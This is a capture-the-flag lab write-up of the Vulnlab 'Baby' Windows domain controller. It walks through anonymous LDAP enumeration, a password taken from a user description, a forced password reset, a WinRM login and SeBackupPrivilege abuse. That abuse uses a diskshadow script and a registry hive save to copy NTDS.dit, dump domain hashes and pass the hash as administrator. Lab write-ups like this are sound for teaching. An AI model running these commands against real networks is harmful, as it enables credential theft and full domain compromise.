Baby from Vulnlab, an easy rated windows machine involved enumerating ldap to query users and finding a password, on having the right set of credentials it needed a password change which then allows you to login through WinRM, the user having SeBackupPrivilege , can take backup of the drive and copy NTDS.dit and copying security file locally on the machine to dump hashes.
NMAP
Nmap scan report for 10.10.83.40
Host is up (0.081s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after: 2023-12-16T16:00:59
| MD5: 55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp open tcpwrapped
49664/tcp open tcpwrapped
60083/tcp open tcpwrapped
65331/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsPORT 445 (SMB)
Enumerating smb shares with anonymous user it doesn’t allow us to either list or read shares being unauthenticated
We can move on to ldap which is running on port 389
PORT 389 (LDAP)
On checking ldap with null authentication
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl"This starts to return us usernames
We can use grep to filter usernames
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'With kerbrute we can verify domain users which also perform AS-REP roasting but here it didn’t found any domain user with pre-authentication disabled
We can grep for user descriptions where on Teresa.Bell 's password was found from it's description
But using this password for Teresa failed as this password doesn’t belong to her
Spraying this password across the domain didn’t worked as well
Foothold (Connor.Wilkinson)
So going back to ldap, there was a user Caroline.Robinson which didn't had any attributes thus didn't get covered when it was getting filtered with sAMAccountName
For this username the password is valid but it needs to be changed
We can change her password by using impacket’s smbpasswd by referring to this article
smbpasswd -U Caroline.Robinson -r 10.10.83.40We can try authenticating on WinRM to see if this user is in remote desktop group
It shows Pwn3d! status which means we can login through WinRM
evil-winrm -i 10.10.83.40 -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'Checking the privileges of this account with whoami /all we have SeBackupPrivilege privilege
Caroline’s password will keep getting revert back as there was a script running, so you’ll need to change the password again
Privilege Escalation (Administrator)
Following this article , we can abuse SeBackupPrivilege by create a dsh script file to create a volume convert it to dos format with unix2dos
set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:Now with robocop, copying NTDS.dit file in current directory
Downloading the file on to our kali machine
After downloading the file we’ll have ntds.dit
We’ll also need SYSTEM file
reg save hklm\system C:\Windows\Temp\systemHaving this file, we’ll be able to parse through NTDS.dit file to dump hashes and get the administrator’s hash
Now with pass the hash we'll be able to login as administrator
